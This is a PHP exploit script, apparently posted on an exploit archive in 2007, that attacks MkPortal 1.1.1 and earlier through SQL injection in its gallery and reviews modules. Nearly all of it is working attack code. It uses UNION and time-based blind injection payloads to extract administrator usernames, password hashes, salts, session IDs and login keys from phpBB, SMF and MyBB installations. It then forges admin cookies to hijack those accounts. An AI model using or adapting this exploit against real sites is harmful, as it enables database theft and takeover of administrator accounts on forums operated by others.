mkportal-sql.txt

Posted on 13 July 2007
<?php

/*
[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal <= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids

[Notes]
At this time MkPortal 1.1.1 is the latest stable release
Currently implemented: phpbb, smf and mybb
*/


$exptime = 3600;
$stcnt = 300000;
$maxnull = 5;

$opts = getopt("u:U:P:f:m:d:o:");

$vars = array ( "phpbb", "1 UNION SELECT %s FROM phpbb_users WHERE user_id=2",
"phpbb_sid", "1 UNION SELECT %s FROM phpbb_sessions WHERE session_user_id=2 ORDER BY descrizione DESC LIMIT 1",
"smf", "1 UNION SELECT %s FROM smf_members WHERE ID_MEMBER=1",
"mybb", "1 UNION SELECT %s FROM mybb_users WHERE uid=1",
);


print
"[i] MkPortal "reviews" and "gallery" modules SQL Injection Exploit
[i] Vulnerable versions: MkPortal <= 1.1.1
[i] Bug discovered by: Coloss
[i] Exploit by: Coloss
[i] Date: 06.07.2007
[i] This is priv8 not for kids

";


if ($opts[u] == '')
die(help($argv[0]));

if (!strncmp($opts[u], "http", 4))
$url = $opts[u];
else
$url = "http://".$opts[u];

if ($opts[U])
$user = $opts[U];
if ($opts[P])
$pass = $opts[P];
if ($opts[f])
$forum = $opts[f];
if ($opts[m])
$met = $opts[m];
if ($opts[o])
$file = $opts[o];
if ($opts[d])
$dir = $opts[d];

$cookies = '';
$delay = $min = $max = $mid = 0;
$fld1 = $fld2 = '';

if (!$forum)
die("[X] You haven't specified any forum type!
");

echo "[+] Target: $url [$forum]

";

exploit();


function exploit_gallery ($f)
{
global $cookies, $url, $fld1, $fld2;
$sql = get_sql($f);
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
$req = sprintf($sql, $str);

$u = $url."index.php?ind=gallery&op=edit_file&iden=".urlencode($req);
$html = Send($u, NULL, $cookies);
if (strstr($html, "ERROR: Database error"))
die("[X] SQL Query Error.. probably wrong table prefix
");
else if (strstr($html, "<title>Error</title>"))
die("[X] This method failed. Try something else
");

$var1 = get_string($html,"name="titolo" value="",""");
$var2 = get_string($html,"name="descrizione" class="bgselect">","<");

return ($var1." ".$var2);
}

function get_delay ($cnt, $f, $u)
{
global $url, $cookies, $fld1, $fld2, $met;

$sql = get_sql($f);

if (strstr($met, "gallery"))
$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
else
$str = $fld1;

$inj = sprintf($sql, $str);

if (strstr($inj, "ORDER BY")) {
list($base, $order) = explode("ORDER BY", $inj);
$inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,1,BENCHMARK(%d,MD5(31337))) ORDER BY". $order;
}
else
$inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,1,BENCHMARK(%d,MD5(31337)))";

$req = sprintf($inj, $fld1, 1, "=1", $cnt);
$u .= urlencode($req);

$start = getmicrotime();
Send($u, NULL, $cookies);
$end = getmicrotime();

$delay = intval(10 * ($end - $start));
return $delay;
}

function get_normaldelay ($f, $u)
{
global $stcnt;

$na = get_delay(1,$f,$u);
$da = get_delay($stcnt,$f,$u);
$nb = get_delay(1,$f,$u);
$db = get_delay($stcnt,$f,$u);
$nc = get_delay(1,$f,$u);
$dc = get_delay($stcnt,$f,$u);

$mean_delayed = intval(($da + $db + $dc) / 3);
if ($mean_delayed < 2)
die("Failed. The Answer was too rapid, probably you have not enough privileges
");
return $mean_delayed;
}

function exploit_blind ($sql, $u, $field)
{
global $cookies, $stcnt, $delay, $min, $max, $mid;

$cnt = $stcnt * 4;

echo "[->] Trying to find value for '".$field."'
";

for ($i = 1; $i < 51; $i++) {
for ($j = $min; $j <= $max; $j++) {
if ($j == $mid)
$j = 97;
$req = sprintf($sql, $field, $i, "=$j", $cnt);
$ur = $u.urlencode($req);
$start = getmicrotime();
Send($ur, NULL, $cookies);
$end = getmicrotime();

$dtime = intval(10 * ($end - $start));
if ($dtime > ($delay * 2)) {
$out .= chr($j);
echo "[+] Current value for '".$field."' (".$i."): ".$out."
";
break;
}
if ($j == $max)
$i = 41;
}
}
if ($out)
echo "
[->] Found value for '".$field."': ".$out."

";
return $out;
}


function exploit_gallery_blind ($f)
{
global $fld1, $fld2, $url;

$str = "NULL,".$fld1.",".$fld2.",NULL,NULL";
$sql = get_sql($f);
$inj = sprintf($sql, $str);

$u = $url."index.php?ind=gallery&op=edit_file&iden=";

$var1 = exploit_init_blind($f, $u, $inj, $fld1);
$var2 = exploit_init_blind($f, $u, $inj, $fld2);

return ($var1." ".$var2);
}

function exploit_reviews ($f)
{
global $fld1, $fld2, $url;

$u = $url."index.php?ind=reviews&op=update_file&iden=";
$sql = get_sql($f);

$inj = sprintf($sql, $fld1);
$var1 = exploit_init_blind($f, $u, $inj, $fld1);

$inj = sprintf($sql, $fld2);
$var2 = exploit_init_blind($f, $u, $inj, $fld2);

return ($var1." ".$var2);
}

function exploit_init_blind ($f, $u, $inj, $field)
{
global $cookies, $delay, $fld1, $fld2, $mid;

if (strstr($inj, "ORDER BY")) {
list($base, $order) = explode("ORDER BY", $inj);
if ($mid == 58)
$inj = $base."AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
else
$inj = $base."AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1) ORDER BY". $order;
}
else {
if ($mid == 58)
$inj .= " AND IF(ORD(LOWER(SUBSTR(%s,%d,1)))%s,BENCHMARK(%d,MD5(31337)),1)";
else
$inj .= " AND IF(ORD(SUBSTR(%s,%d,1))%s,BENCHMARK(%d,MD5(31337)),1)";
}

echo "[->] Starting blind sql injection!
";

echo "[+] Getting standard response delay... ";
$delay = get_normaldelay($f,$u);
echo $delay."ds

";

$var = exploit_blind($inj, $u, $field);
if (strstr($f, "sid") && !$var)
die("[X] Probably there are more sid in the table.. so we cannot fetch it.. retry later.
");

return $var;
}

function get_data ($f)
{
global $met;

switch ($met) {
case 'reviews':
$res = exploit_reviews($f); break;
case 'gallery-blind':
$res = exploit_gallery_blind($f); break;
case 'gallery':
$res = exploit_gallery($f); break;
default:
die("[X] Invalid exploit method specified
");
}
return $res;
}

function phpbb_exploit ()
{
global $dir, $url, $user, $pass, $cookies, $forum, $exptime, $fld1, $fld2, $min, $max, $mid;

if ($user && $pass) {
echo "[+] Logging in... ";

$u = $url.$dir."login.php?login=true";
$post = "username=".$user."&password=".$pass."&redirec=portalhome&submit=Login";

$html = Send($u, $post, NULL, TRUE);

$lines = explode("
", $html);

foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && strstr($line, "sid")) {
$cookies = get_string($line, "Set-Cookie: ", ";");
$c++;
}
}
if (!$cookies || $c < 2)
die("Failed
");
echo "Successfull

";
}

$fld1 = "username"; $fld2 = "user_password";
$min = 48; $max = 122; $mid = 58;

$res = get_data($forum);
list($auesr, $apwd) = explode(" ", $res);
if ($auser && strlen($apwd) == 32) {
owrite("
[+] Target: $url [$forum]
");
owrite("[->] Found admin username: '".$auser."'
");
owrite("[->] Found admin hash password: '".$apwd."'
");
}
else
die("[X] Failed to retrive informations
");

$fld1 = "session_id"; $fld2 = "session_time";
$max = 102;

$res = get_data($forum."_sid");
list($sid,$start) = explode(" ", $res);
if ($sid && strlen($sid) == 32) {
$t = (int) (time() - $start - $exptime);
if ($t >= 0)
echo "[!] Found admin sid ('".$sid."') but it should not be valid anymore
";
else
owrite("[->] Found admin sid: '".$sid."' valid for ~".abs($t)."s
");
}
else
echo "[!] No admin sid was found
";
}

function smf_exploit ()
{
global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max;

$base = 'a:4:{i:0;s:1:"1";i:1;s:40:"%s";i:2;i:1184000000;i:3;i:0;}';

if ($user && $pass) {
echo "[+] Logging in... ";

$u = $url.$dir."index.php?action=login2";
$post = "user=".$user."&passwrd=".$pass."&cookieneverexp=on&submit=Login";
$html = Send($u, $post, NULL, TRUE);

$lines = explode("
", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID"))
$cookies = get_string($line, "Set-Cookie: ", ";");
}
if (!$cookies)
die("Failed
");
echo "Successfull

";
}

$fld1 = "passwd"; $fld2 = "passwordSalt";
$min = 48; $max = 102; $mid = 58;

$res = get_data($forum);
list($pwd,$salt) = explode(" ", $res);
if ($pwd && strlen($pwd) == 40 && strlen($salt) == 4) {
$pass = $pwd.$salt;
$pass = sha1($pass);
$cookie = sprintf($base, $pass);
list($cname) = explode("=", $cookies);
owrite("
[+] Target: $url [$forum]
");
owrite("[+] Found admin cookie '".$cname."': '".urlencode($cookie)."'
");
}
else
die("[X] Failed to retrive informations
");
}

function mybb_exploit ()
{
global $user, $pass, $url, $dir, $cookies, $forum, $fld1, $fld2, $min, $max, $mid;

if ($user && $pass) {
echo "[+] Logging in... ";

$u = $url.$dir."member.php";
$post = "username=".$user."&password=".$pass."&action=do_login&submit=Login";
$html = Send($u, $post, NULL, TRUE);

$lines = explode("
", $html);
foreach($lines as $line) {
if (strstr($line, "Set-Cookie") && !strstr($line, "PHPSESSID") && !strstr($line, "[last") && !strstr($line,
" sid=")) {
$cookies = get_string($line, "Set-Cookie: ", ";");
}
}
if (!$cookies)
die("Failed
");
echo "Successfull

";
}

$fld1 = "loginkey"; $fld2 = "username";
$min = 48; $max = 122; $mid = 91;

$res = get_data($forum);
list($key,$auser) = explode(" ", $res);
if ($key && strlen($key) == 50) {
$cookie = sprintf($base, $pass);
list($cname) = explode("=", $cookies);
owrite("
[+] Target: $url [$forum]
");
owrite("[+] Found admin cookie '".$cname."': '1_".$key."'
");
}
else
die("[X] Failed to retrive informations
");

$fld1 = "password"; $fld2 = "salt";

$res = get_data($forum);
list($apwd,$salt) = explode(" ", $res);
if ($apwd && strlen($apwd) == 32 && $salt && strlen($salt) == 8) {
owrite("[+] Found admin hash password: '".$apwd."'
");
owrite("[+] Found admin password salt: '".$salt."'
");
}
else
echo "[!] No admin sid was found
";
}

function exploit ()
{
global $forum;

switch ($forum) {
case 'phpbb':
phpbb_exploit(); break;
case 'smf':
smf_exploit(); break;
case 'mybb':
mybb_exploit(); break;
default:
die("Failed. Cannot handle this type of forum
");
}
}

function get_string ($str, $start, $end)
{
$res = substr($str, strpos($str, $start)+strlen($start),strpos(substr($str, strpos($str,
$start)+strlen($start),strlen($str)), $end));
return $res;
}

function get_sql ($var)
{
global $vars;

for ($i = 0, $j = 1; $vars[$i]; $i++, $j++) {
if ($vars[$i] == $var)
return $vars[$j];
}
}

function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}

function Send($url, $post_fields='', $cookie = '', $headers = FALSE)
{
$ch = curl_init();
$timeout = 120;

curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);

if ($post_fields) {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);
}

curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)');

if(!empty($cookie))
curl_setopt ($ch, CURLOPT_COOKIE, $cookie);

if($headers === TRUE)
curl_setopt ($ch, CURLOPT_HEADER, TRUE);
else
curl_setopt ($ch, CURLOPT_HEADER, FALSE);

curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

$fc = curl_exec($ch);
curl_close($ch);

return $fc;
}

function owrite ($msg)
{
global $file, $debug;

echo $msg;

if ($file) {
if (!($h = fopen($file, 'ab')) && $debug) {
echo "[X] Cannot open '$file'
";
return;
}
if (fwrite($h, $msg) === FALSE && $debug)
echo "[X] Cannot write to '$file'
";
fclose($h);
}
}

function help ($prog)
{
print "[-] Usage: $prog
-u  <url>      -> Sets Target url
[-U] <user>     -> Your username
[-P] <hash>     -> Your password
[-f] <type>     -> Sets Forum type (phpbb, smf or mybb)
[-m] <method>   -> Which method do you want to use (gallery or reviews)
[-d] <dir>      -> Sets forum subdirectory
[-o] <file>     -> Writes results to a file
";
}

?>
TOP
Malware :

Last 20
Exploits :

Last 20